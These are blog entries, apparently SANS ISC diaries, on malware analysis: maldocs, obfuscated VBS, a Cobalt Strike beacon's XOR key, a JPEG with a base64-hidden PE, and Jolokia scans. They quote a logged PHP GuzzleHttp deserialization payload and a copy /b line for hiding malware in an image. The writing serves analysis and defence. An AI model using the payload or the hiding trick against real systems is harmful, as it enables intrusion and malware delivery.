[3] https://www.virustotal.com/gui/url/bdebda9813ab5d38ec1e2b691aa40e2886f3c38e726780560b59af6007906ad6?nocache=1

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2022-09-09

Maldoc With Decoy BASE64

There is also a video for this analysis: "Maldoc Analysis: Rehearsed vs. Unrehearsed".

I analysed this maldoc. It contains an old exploit for the equation editor. Nothing special. And it's easy to analyze.

But there is one more thing: it contains a very long BASE64 string, 800,000+ characters, and it turns out to be a decoy.

The analysis doesn't take long, with oledump.py and the shellcode emulator scdbg.exe:

 

The stream with the shellcode is large (almost 1MB). And it contains a very long BASE64 string:

The decoded data has a very high entropy: 7.98... That's like random data.

To determine whether the BASE64 string is part of the exploit or not, I removed it and emulated the payload again.

So I cut out the first 0x6E0 bytes of the stream, i.e., without that BASE64 string, and ran the shellcode emulator on it:

I get exactly the same result: that BASE64 string is not necessary for the shellcode execution.

And it's not likely to be necessary for the downloaded EXE, as that is executed inside a new process, and the Excel process is killed at the end of the shellcode.

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-08

Analyzing Obfuscated VBS with CyberChef

I took a closer look at this sample on MalwareBazaar, because it had no tags (now it has a VBS tag).

This time, I do the analysis with CyberChef.

I start by pasting a hexdump of the malicious file into CyberChef (produced with my tool zipdump.py):

And I use magic to identify the file:

It's UTF-16 Little-Endian. And although CyberChef doesn't mention it, it has a Byte Order Mark (BOM): it starts with FF FE.

I decode the bytes as UTF-16LE and see a long list of lines with : and ::

I filter these lines (: and ::) out with the filter command:

What remains is VBS code: I know this because of the dim and execute statements.

Dim is Visual Basic, thus VBS or VBA. But execute is VBS only.

Let's go through the code:

A lot of string obfuscation, with non-ASCII characters.

I notice the following:

There's a small piece of code with a string of two Unicode characters that seem to represent a house, followed by a string with the uppercase letter A.

This could be an obfuscated search and replace operation.

Let's try that with CyberChef:

And indeed, we seem to get reversed BASE64 data (starting with ==).

Then I spot something else:

Let's do another search and replace, now for letter Z:

That does indeed look like reversed BASE64.

Let's extract and reverse it:

And now decode it:

That is a PowerShell script, an encoded command: it needs to be decoded from UTF16:

If you are interested in the CyberChef recipe, you can find it here.

I was able to download the file; that analysis is for another diary entry.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-07

PHP Deserialization Exploit attempt

I came across the following deserialization exploit attempt not in a honeypot but in the log for this (isc.sans.edu) webserver:

/!php/object+"O:24:\\"GuzzleHttp\\\\Psr7\\\\FnStream\\":2:{s:33:\\"\\0GuzzleHttp\\\\Psr7\\\\FnStream\\0methods\\";a:1:{s:5:\\"close\\";s:7:\\"phpinfo\\";}s:9:\\"_fn_close\\";s:7:\\"phpinfo\\";}"/recentdomains/,

People usually think about deserialization vulnerabilities in Java (and maybe .Net). But code written in any object-oriented language may be susceptible to deserialization vulnerabilities.

In some ways, the PHP example is even more "transparent" than some of the past Java examples I have seen. Deserialization vulnerabilities are a bit weird in that they just take advantage of a feature in how objects are instantiated. Software may exchange arbitrary objects serialized as a string. As the object is deserialized, its constructor is called, which may execute arbitrary code delivered with the object. Think about it as calling "eval" on the string received. [owasp]

This can be "ok", if only a limited set of objects are deserialized or if the object is received from a trusted source and properly digitally signed to avoid tampering with the object in transit. But the process quickly goes wrong if arbitrary objects are deserialized from arbitrary sources.

In this case, the attacker can find a "Gadget," which is an object that allows code execution, and feed it to the software using the "correct" parameters. In the case above, the gadget is "GuzzleHttp." There is nothing "wrong" with GuzzleHttp. GuzzleHttp is a PHP library used to create HTTP requests. Similar to the standard library "curl," it abstracts some lower-level features. GuzzleHttp is often installed as part of other packages (e.g. Laravel) if you use extensions that connect to HTTP APIs. So this is not a vulnerability in GuzzleHttp, but the attacker is looking for code that accepts GuzzleHttp objects and instantiates them (I do not think this is ever a good idea). [guzzle]

I am not sure what vulnerable software the exploit above looks for. But it attempts to execute phpinfo. This exploit will only flag vulnerable pages, to come back to and exploit later. Let me know if you can identify it (email jullrich\@/sans.edu).

GuzzleHttp is a well-known gadget; you can find it listed in a GitHub repository of well-known gadget chains for various vulnerabilities. [gadgets]
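To show what a defender can do with such a string before it ever reaches unserialize(), here is an added example (not the diary's code, and not phpggc's): a minimal parser for PHP's serialize() format that lists every class a payload would instantiate, so a request can be rejected when it names anything outside an allow list. The payload is the one from the log line above with the log's escaping removed; the class and function names are assumed from that line.

```python
class PhpObject:                 # one "O:" value: class name plus properties
    def __init__(self, cls, props):
        self.cls, self.props = cls, props

# Payload reconstructed from the log line above, with the log's escaping removed.
PAYLOAD = ('O:24:"GuzzleHttp\\Psr7\\FnStream":2:{'
           's:33:"\x00GuzzleHttp\\Psr7\\FnStream\x00methods";'
           'a:1:{s:5:"close";s:7:"phpinfo";}'
           's:9:"_fn_close";s:7:"phpinfo";}')

def _num(data, pos):             # read digits up to ':' -> (value, pos after ':')
    end = data.index(':', pos)
    return int(data[pos:end]), end + 1

def parse(data, pos=0):
    """Parse one serialized value at pos; return (value, next position)."""
    t = data[pos]
    if t == 'i':                                       # i:42;
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if t == 's':                                       # s:5:"close";
        n, pos = _num(data, pos + 2)
        return data[pos + 1:pos + 1 + n], pos + n + 3  # past closing quote and ';'
    if t in 'aO':                                      # a:1:{...}   O:24:"Cls":2:{...}
        cls, pos = None, pos + 2                       # 'a:' -> element count follows
        if t == 'O':                                   # 'O:' -> class name comes first
            n, pos = _num(data, pos)
            cls, pos = data[pos + 1:pos + 1 + n], pos + n + 3
        count, pos = _num(data, pos)
        pos += 1                                       # skip '{'
        items = {}
        for _ in range(count):
            k, pos = parse(data, pos)
            v, pos = parse(data, pos)
            # private/protected names carry a "\0Class\0" or "\0*\0" prefix
            items[k.rsplit('\x00', 1)[-1] if isinstance(k, str) else k] = v
        return (PhpObject(cls, items) if cls else items), pos + 1   # past '}'
    raise ValueError(f"unsupported type {t!r} at offset {pos}")

def object_classes(value):       # every class the value would instantiate
    if isinstance(value, PhpObject):
        return [value.cls] + object_classes(value.props)
    if isinstance(value, dict):
        return [c for v in value.values() for c in object_classes(v)]
    return []

def unexpected_objects(payload, allowed=()):   # classes not on the allow list
    value, _ = parse(payload)
    return [c for c in object_classes(value) if c not in allowed]
```

With an empty allow list, which is the right default for untrusted input, any `O:` value at all is reported; the same walk also exposes the callable names (here phpinfo) stored in the gadget's properties.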

[owasp] https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
[guzzle] https://docs.guzzlephp.org/en/stable/
[gadgets] https://github.com/ambionics/phpggc


---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Published: 2022-09-06

Analysis of an Encoded Cobalt Strike Beacon

I also created a video for this diary entry.

Someone reached out to me for the analysis of a Cobalt Strike beacon. This is the sample.

My tool 1768.py (a tool to analyse Cobalt Strike beacons) isn't able to find the configuration:

When something like this happens, I always try option -r. Option -r is raw mode: by default, 1768.py analyses the relevant sections of a PE file, but in raw mode, it takes a look at the complete file.

But this too doesn't work.

What you can do in a case like this, is execute the sample inside a sandbox, make a process memory dump of it, and then have 1768.py analyse the process memory dump. This often works for obfuscated/packed samples.

But first, I took a look at the PE file with my tool pecheck.py, to see if I could recognize anything that my tool didn't catch.

And there is an overlay (data appended to the end of the PE file). This overlay has a high entropy, and it's 256 KB and represents more than 90% of the total size of the PE file.

Let's take a look at the sections of the PE file to confirm this:

These are indeed all small sections; the largest is 10 KB. So that's too small to contain a stageless Cobalt Strike beacon, but the overlay is large enough.

Let's take a look at the overlay:

That doesn't ring a bell to me. But it seems that there is a repeating byte sequence at the end. Let's take a closer look:

Indeed: there is a repeating sequence of 18 bytes here (I highlighted 2 of them in red and green). This often happens when a PE file is XORed with a key: the end of a PE file is often a series of NUL bytes (0x00), and thus it reveals the XOR key.

I recovered the XOR key with trial-and-error, but I'm not going to explain this here (I do explain it in the video, about halfway). What I did do is update my tool xor-kpa.py that I use to perform XOR known plaintext attacks. I added a definition for the encoded public key header found in a Cobalt Strike configuration: cs-key-dot.

Let's try that:

And indeed, a key was found, and it's very likely a good key, because 15 extra bytes were found. This means that a repetition of the key found 15 extra bytes matching the cs-key-dot signature.

I now use option -d to let xor-kpa.py decode the payload with the XOR key that was listed as last (thus with the highest probability of being correct), and I feed this output into 1768.py:

And now we have recovered the configuration.
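The two ideas used above, a NUL-padded tail leaking a repeating XOR key and a known-plaintext attack whose "extra bytes" confirm the key, in a small added example (my own code, not xor-kpa.py). The sample, the 18-byte key and the 33-byte marker standing in for the cs-key-dot signature are constructed; only the structure (key shorter than the known plaintext, NUL tail) mirrors the beacon discussed.

```python
def xor(data, key):
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def find_period(ct, max_len=64, repeats=3):
    """Smallest p such that the last repeats*p bytes repeat every p bytes:
    a NUL-padded plaintext tail makes the ciphertext tail equal the key."""
    for p in range(1, max_len + 1):
        tail = ct[-repeats * p:]
        if all(tail[i] == tail[i % p] for i in range(len(tail))):
            return p
    return None

def key_from_tail(ct, keylen):
    """Recover the key from the last keylen bytes, assuming NUL plaintext there."""
    key = bytearray(keylen)
    for j in range(len(ct) - keylen, len(ct)):
        key[j % keylen] = ct[j]          # 0x00 ^ key == key, phase given by j
    return bytes(key)

def kpa(ct, known, keylen):
    """Known-plaintext attack: slide `known` over ct and keep every offset where
    one repeating key of length keylen explains all of it. The bytes beyond the
    first keylen are the 'extra bytes' that confirm the key (xor-kpa's score)."""
    hits = []
    for off in range(len(ct) - len(known) + 1):
        key = [None] * keylen
        for i, p in enumerate(known):
            idx, k = (off + i) % keylen, ct[off + i] ^ p
            if key[idx] is None:
                key[idx] = k
            elif key[idx] != k:
                break                    # contradiction: not this offset
        else:
            if None not in key:
                hits.append((off, bytes(key), len(known) - keylen))
    return hits

# Constructed sample: 18-byte key with distinct bytes, a 33-byte marker standing
# in for the cs-key-dot signature, and a NUL-padded tail like a PE overlay.
KEY = bytes(range(0x21, 0x21 + 18))
MARKER = b"[constructed cs-key-dot stand-in]"
PLAIN = b"constructed stage: " + bytes(range(64, 120)) + MARKER + b" more config " + bytes(64)
CT = xor(PLAIN, KEY)
```

Running find_period on CT gives 18, key_from_tail returns KEY, and kpa reports the marker's offset with 15 extra bytes, the same confidence figure the tool printed above.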


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-05

Quickie: Grep & Tail -f With Notepad++

Notepad++ is a free and open source text editor for Windows.

You can simulate grep-like functionality with Notepad++ in 2 steps:

  1. Use find with a search pattern to bookmark all found lines
  2. Remove unmarked lines

Example:

A Windows event log as CSV file:

Start a search (Search / Find... or CTRL-F) and select the Mark tab:

Then do the following:

  1. clear all bookmarks, in case there are any left from previous operations
  2. type your search text (can be regex)
  3. toggle Bookmark line
  4. press Mark All button
  5. press Close button

After pressing the Mark All button, you will see how many lines have been bookmarked:

Then go to Search / Bookmark / Remove Unmarked Lines:

And you have your grep result:

If you do this with a file on disk that you don't want to modify, make sure not to save anything after the grep (or work on a copy).

It is also possible to do a "grep -v": select "Remove Bookmarked Lines".


Next tip: tail -f with Notepad++

When a text file is open, the Monitoring icon in the toolbar is enabled:

Press the button and the tab of the open text file will get a Monitoring icon:

From now on, lines appended to the file will appear automatically:

Notice that a monitored file cannot be edited.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-04

Video: VBA Maldoc & UTF7 (APT-C-35)

I recorded a video for the maldoc analysis I did in diary entries "VBA Maldoc & UTF7 (APT-C-35)" and "Update: VBA Maldoc & UTF7 (APT-C-35)".

The analysis of shellcode is a bit different in the video, compared to the 2 diary entries I wrote. There's often more than one solution when doing maldoc analysis :-) .


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-03

Video: James Webb JPEG With Malware

I recorded a video for yesterday's diary entry James Webb JPEG With Malware.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-02

James Webb JPEG With Malware

On Wednesday's stormcast, Johannes talked about a JPEG picture (coming from the James Webb telescope) that malware authors had laced with malware.

I always like to take a look at such images with my analysis tools, like jpegdump.py.

This is the picture laced with malware.

When I run jpegdump.py on this picture, I get an overview of all the segments:

In a "normal" JPEG picture, you will find one Start Of Image (SOI) segment as the first segment in the file, and one End Of Image (EOI) segment as the last segment in the file.

Here we find 3 different SOIs and EOIs. Segments 1, 16 and 31 are SOI segments, and segments 15, 30 and 45 are EOI segments.

So there are 3 JPEG images in this file.

To check if these images are the same, I use option -E to display the hash of the data of each segment (I use MD5 for the demo here because it gives shorter strings than sha1 and sha256, and thus will not line wrap).

Notice that for the second and third JPEG image (between SOI and EOI), all the hash values are followed by parentheses and numbers.

Like for segment 17: md5=03fb38d57f72262e0160ee82f2e81b3e(2)

This means that the hash of the data of segment 17 is the same as the hash of the data of segment 2. Thus the data is the same, if you don't fear md5 collisions (and if you do, just use sha256).

And that is the case for all segments of the second and third JPEG image. So what we have here, is a concatenation of 3 identical JPEG pictures.

Next, notice that the difference (d= value) of segment 16 is not 0.

This means that there is some data between segment 15 and segment 16. d=2320444 means that there are 2320444 bytes of data between EOI (segment 15) and SOI (segment 16).

We can select this data as follows: -s 16d (select the data between segment 15 and 16)

This looks like a certificate in ASCII. Let's dump it:

This is indeed a certificate. Notice that it starts with TV: that means that the data that was BASE64 encoded starts with MZ, the magic header of a PE file.

A valid certificate should have letter M as first letter of the BASE64 data (and not T).

Let's decode this with base64dump.py (option -w ignores all whitespace):

And this is indeed a PE file.

Thus, what the malware authors did was equivalent to: copy /b webb.jpeg + malware.crt + webb.jpeg + webb.jpeg malware.jpeg
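An added example (my own code, not jpegdump.py) of the two checks made above: walk the JPEG marker structure, hash each segment so identical images can be spotted, and report any bytes that sit between segments (jpegdump's d= value). The sample file is constructed: a minimal JPEG and a PEM block whose base64 payload is really a PE header, concatenated like the copy /b command; the real file's offsets and hashes are not reproduced.

```python
import base64
import hashlib

def _marker_at(data, pos):
    """True when a real marker starts at pos (not FF00 stuffing, FFFF fill or RSTn)."""
    return (pos + 1 < len(data) and data[pos] == 0xFF
            and data[pos + 1] not in (0x00, 0xFF) and not 0xD0 <= data[pos + 1] <= 0xD7)

def jpeg_segments(data):
    """Walk the markers the way jpegdump.py lists them. Each entry records the
    segment offset, marker, size, MD5 of its bytes and the number of foreign
    bytes ('d=') that preceded it, i.e. data sitting between two segments."""
    segs, pos, gap = [], 0, 0
    while pos + 1 < len(data):
        if not _marker_at(data, pos):
            pos, gap = pos + 1, gap + 1       # not inside a segment: count it
            continue
        start, marker = pos, data[pos + 1]
        if marker in (0xD8, 0xD9, 0x01):      # SOI, EOI, TEM carry no length field
            pos += 2
        else:
            pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")
            if marker == 0xDA:                # SOS: entropy-coded data follows
                while pos + 1 < len(data) and not _marker_at(data, pos):
                    pos += 1
        segs.append({"offset": start, "marker": marker, "size": pos - start,
                     "gap": gap, "md5": hashlib.md5(data[start:pos]).hexdigest()})
        gap = 0
    return segs

def hidden_data(data):
    """Number of SOI markers and every (offset, bytes) chunk found between segments."""
    segs = jpeg_segments(data)
    n_soi = sum(1 for s in segs if s["marker"] == 0xD8)
    gaps = [(s["offset"] - s["gap"], data[s["offset"] - s["gap"]:s["offset"]])
            for s in segs if s["gap"]]
    return n_soi, gaps

# Constructed sample: a minimal JPEG (SOI, APP0, SOS with FF00-stuffed scan data, EOI)
# and a PEM block whose base64 payload starts with MZ, glued together like copy /b.
WEBB = (b"\xff\xd8" + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
        + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34\xff\x00\x56" + b"\xff\xd9")
FAKE_PE = b"MZ" + bytes(40)
PEM = (b"-----BEGIN CERTIFICATE-----\n" + base64.b64encode(FAKE_PE)
       + b"\n-----END CERTIFICATE-----\n")
SAMPLE = WEBB + PEM + WEBB + WEBB
```

On SAMPLE the walker reports three SOI markers, identical MD5s for the matching segments of each copy, and one gap holding the PEM block whose base64 line starts with TV.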


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-01

Jolokia Scans: Possible Hunt for Vulnerable Apache Geode Servers (CVE-2022-37021)

On Tuesday, the Apache project released an update for Geode. The update patches a typical deserialization issue we often see in Java software like Geode (CVE-2022-37021). Geode is a data management platform. It has to deal with a wide range of objects and formats. The simple allow listing approach usually doesn't work well in these environments.

But the vulnerability has a few dependencies:

  • You are only vulnerable if you are using Java 8. Java 8 is considered "on its way out," but it is still widely used. In particular, enterprise applications using Geode will often use Java 8 and are difficult to migrate.
  • JMX and RMI are used for the attack. These protocols are common in Java but are usually not directly exposed to the outside. You may remember RMI for its use in log4j exploits. An attacker would likely need to find a gateway to reach the Geode server via HTTP.

And here comes Jolokia. "JMX on Capsaicin," as it calls itself. It provides a simple HTTP to JMX gateway. So it is somewhat interesting that I also saw some scans for Jolokia starting yesterday.

The scans all arrive from 23.94.248.134. I saw the first requests arrive at around 12:30 pm UTC on Aug 30th, a couple of hours before the vulnerability was made public on Geode's website. I am not sure if it was made public via other channels earlier.

The IP address itself is "unremarkable." It is assigned to ColoCrossing. We got some logs from this IP from 2015 and 2016. It looks like a "random colocated server" that gets compromised every so often. Shodan only shows port 53 open.

The scans target ports 80 and 8080, likely targets for a Jolokia setup. Two URLs are requested:

GET /actuator/jolokia/list HTTP/1.1
GET /jolokia/list HTTP/1.1

All requests use a specific User-Agent:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0

My recommendation at this point:

  • First of all, make sure to patch Geode.
  • You may as well block that IP and User-Agent for the time being. It may not do much good in the long run, but it is simple enough.

The link between these scans and Geode is based on the timing of the scans. I do not have any actual exploit payloads right now. Time to figure out if it is worthwhile to set up a full Geode honeypot/VM.

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
